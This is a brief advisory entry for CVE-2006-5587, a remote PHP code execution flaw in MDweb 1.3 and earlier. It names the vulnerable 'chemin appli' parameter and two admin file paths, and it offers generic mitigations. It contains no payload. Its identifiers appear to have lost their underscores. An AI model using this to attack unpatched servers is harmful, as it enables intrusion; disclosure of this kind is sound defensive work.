CVE-2006-5587

Name of the Vulnerable Software and Affected Versions: MDweb versions 1.3 and earlier

Description: The issue allows remote attackers to execute arbitrary PHP code via a URL in the chemin appli parameter in specific PHP files, including "admin/inc/organisations/form org.inc.php" and "admin/inc/organisations/country insert.php".

Recommendations: For MDweb versions 1.3 and earlier, consider restricting access to the chemin appli parameter in the affected PHP files until a patch is available. As a temporary workaround, consider disabling the execution of remote PHP code in the "admin/inc/organisations/form org.inc.php" and "admin/inc/organisations/country insert.php" files. Avoid using the chemin appli parameter in the affected files until the issue is resolved.